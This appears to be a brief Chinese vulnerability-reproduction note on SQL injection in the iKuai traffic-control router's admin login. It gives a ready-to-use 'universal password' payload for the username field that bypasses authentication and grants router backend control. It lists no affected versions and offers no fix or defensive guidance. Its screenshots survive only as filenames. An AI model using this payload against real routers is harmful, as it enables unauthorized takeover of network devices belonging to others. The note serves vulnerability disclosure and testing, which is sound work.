iKuai 流控路由 SQL注入漏洞

一、漏洞简介

iKuai 流控路由 存在SQL注入漏洞,可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限。

二、影响版本

三、资产测绘

1708141838923-2e73c81d-9305-4108-a974-55314dbcd36f.png

四、漏洞复现

使用万能密码登陆系统

user: "or""=""or""="
pass:

1708141888537-0e90ab4f-9fcc-4f83-9bb5-3b00d2207213.png

更新: 2024-02-29 23:57:11
原文: https://www.yuque.com/xiaokp7/ocvun2/kx86t3hwzf40pktl